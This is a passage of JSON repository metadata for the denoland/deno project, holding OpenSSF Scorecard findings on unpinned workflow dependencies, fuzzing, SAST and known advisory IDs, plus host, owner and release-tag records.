not pinned by hash: .github/workflows/ci.yml:240: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:251: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:384: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:401: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:462: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:509: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:522: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:731: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:766: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:22: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:26: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:41: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:57: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:61: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:63: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:67: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:74: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/post_publish.yml:14: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:19: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/pr.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/pr.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:36: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:65: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:73: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:104: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:119: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:125: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:133: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:138: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:155: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/start_release.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/start_release.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/version_bump.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:40: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:43: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:38: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: containerImage not pinned by hash: .devcontainer/Dockerfile:1: pin your Docker image by updating mcr.microsoft.com/devcontainers/rust:1 to mcr.microsoft.com/devcontainers/rust:1@sha256:fc57fb865035c5395e85246c8842b071ced6e7cde727b3c98abbcc794eaf4759","Warn: downloadThenRun not pinned by hash: .devcontainer/Dockerfile:10","Info:   0 out of  25 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of  35 third-party GitHubAction dependencies pinned","Info:   0 out of   1 containerImage dependencies pinned","Info:   0 out of   1 downloadThenRun dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 30 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":6,"reason":"4 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-v7pc-74h8-xq2h","Warn: Project is vulnerable to: RUSTSEC-2025-0006","Warn: Project is vulnerable to: RUSTSEC-2024-0436","Warn: Project is vulnerable to: RUSTSEC-2023-0071 / GHSA-4grx-2x9w-596c / GHSA-c38w-74pg-36hr"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-18T04:23:13.226Z","repository_id":37251508,"created_at":"2025-08-18T04:23:13.226Z","updated_at":"2025-08-18T04:23:13.226Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36827962,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-22T15:14:58.755Z","status":"ssl_error","status_checked_at":"2026-08-22T15:14:58.237Z","response_time":51,"last_error":"SSL_read: unexpected eof while reading","robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":false,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"denoland","name":"Deno","uuid":"42048915","kind":"organization","description":"","email":"support@deno.com","website":"https://deno.land","location":null,"twitter":"deno_land","company":null,"icon_url":"https://avatars.githubusercontent.com/u/42048915?v=4","repositories_count":89,"last_synced_at":"2023-04-09T21:37:02.792Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/denoland","funding_links":[],"total_stars":null,"followers":null,"following":null,"created_at":"2022-11-02T16:32:27.195Z","updated_at":"2023-04-09T21:37:03.563Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland/repositories"},"tags":[{"name":"v2.9.5","sha":"17fadf33a8df3af9488b9f42efd1f2290d6dc7a3","kind":"commit","published_at":"2026-08-06T11:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5/manifests"},{"name":"v2.9.4","sha":"14eea3160ae5834476aa3b9d317b8d41d991b982","kind":"commit","published_at":"2026-07-23T14:13:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4/manifests"},{"name":"v2.9.3","sha":"f39575ecd50602a5b42b1ba8e93849460de9fcf4","kind":"commit","published_at":"2026-07-15T13:38:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3/manifests"},{"name":"v2.9.2","sha":"356c132ed60e679b34535a287a493193aa8bb6a4","kind":"commit","published_at":"2026-07-08T10:45:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2/manifests"},{"name":"v2.9.1","sha":"7afe265234add47e7602f2e91c318f3eff245aa8","kind":"commit","published_at":"2026-07-01T13:28:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1/manifests"},{"name":"v2.9.0","sha":"94d375ddd02b7b9eb464781e4bd9e68bf262aacc","kind":"commit","published_at":"2026-06-25T11:49:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0/manifests"},{"name":"v2.8.3","sha":"ba699088698c7b4a2fbea33acc4dcd6571789452","kind":"commit","published_at":"2026-06-11T12:02:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3/manifests"},{"name":"v2.8.2","sha":"085be0b5ff8ca3ccfe58318afe0939c4d4af9743","kind":"commit","published_at":"2026-06-03T11:51:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2/manifests"},{"name":"v2.8.1","sha":"3e2030bc01776ce6b4ca355b1e78c4cb98c82dca","kind":"commit","published_at":"2026-05-27T10:23:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1/manifests"},{"name":"v2.8.0","sha":"fbb5be31ac23ef40f51025d6aeaaa91d9f082e4a","kind":"commit","published_at":"2026-05-22T08:06:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0/manifests"},{"name":"v2.7.14","sha":"2d674b25625bcc367853d00fe86f6e84390f88cb","kind":"commit","published_at":"2026-04-28T12:41:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14/manifests"},{"name":"v2.7.13","sha":"eea91269eb83ff8065afe2e424c8fe78c4b1f448","kind":"commit","published_at":"2026-04-22T11:22:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13/manifests"},{"name":"v2.7.12","sha":"825d2647dd0728723623623b6c7b00da7ddad10d","kind":"commit","published_at":"2026-04-09T18:18:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12/manifests"},{"name":"v2.7.11","sha":"6ddbb099662ea78a62af79484ae773cd9058c815","kind":"commit","published_at":"2026-04-01T09:31:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11/manifests"},{"name":"v2.7.10","sha":"fde6c9c11a5ae8e0dc85f8737b34be11d2aaef32","kind":"commit","published_at":"2026-03-31T12:34:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10/manifests"},{"name":"v2.7.9","sha":"f065b072ab052602746b4be8da37ad90e51aee70","kind":"commit","published_at":"2026-03-27T10:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9/manifests"},{"name":"v2.7.8","sha":"c394911f8edc7591de8da65c7b6690bcbc78afc1","kind":"commit","published_at":"2026-03-25T14:14:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8/manifests"},{"name":"v2.7.7","sha":"8fa9085f90849222bd56facddc16ac288c8ee62e","kind":"commit","published_at":"2026-03-19T11:52:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7/manifests"},{"name":"v2.7.6","sha":"ffbaf13c354a6433a66c2335ab16c4567d357be6","kind":"commit","published_at":"2026-03-18T10:27:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6/manifests"},{"name":"v2.7.5","sha":"0238181e8a95be0885da93bbc99997988d07bff0","kind":"commit","published_at":"2026-03-11T09:51:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5/manifests"},{"name":"v2.7.4","sha":"8274bf758236405d50046dbe31beba96b6d3d2f6","kind":"commit","published_at":"2026-03-05T12:10:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4/manifests"},{"name":"v2.7.3","sha":"e78a7fa8d86848a759e6743537cf90013c7160b1","kind":"commit","published_at":"2026-03-04T14:23:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3/manifests"},{"name":"v2.7.2","sha":"83e374686079a2f067115e60ad91ec38f4f6118b","kind":"commit","published_at":"2026-03-03T14:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2/manifests"},{"name":"v2.7.1","sha":"1df618d969894353731981a17784816167ad82fb","kind":"commit","published_at":"2026-02-25T15:42:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1/manifests"},{"name":"v2.7.0","sha":"fb4db333c37ec1242a6f80738510d214018fea53","kind":"commit","published_at":"2026-02-25T09:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0/manifests"},{"name":"v2.6.10","sha":"8871ade7aa09eb907a04ee61a427f5ba14c54014","kind":"commit","published_at":"2026-02-17T14:05:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10/manifests"},{"name":"v2.6.9","sha":"7a9888857e01c02417fd38144d4bf0ace73eb6ab","kind":"commit","published_at":"2026-02-10T14:53:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9/manifests"},{"name":"v2.6.8","sha":"7ab62a769be154c0926fe8be640d48674eb79614","kind":"commit","published_at":"2026-02-02T13:42:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8/manifests"},{"name":"v2.6.7","sha":"d155af667f0e57277dc992d1b9609d5e6712908d","kind":"commit","published_at":"2026-01-29T11:26:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7/manifests"},{"name":"v2.5.7","sha":"8533c169419c6c92069cb5981a73ee9c36d19798","kind":"commit","published_at":"2026-01-27T16:21:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.7","dependencies_parsed_at":null,"dependency_job_i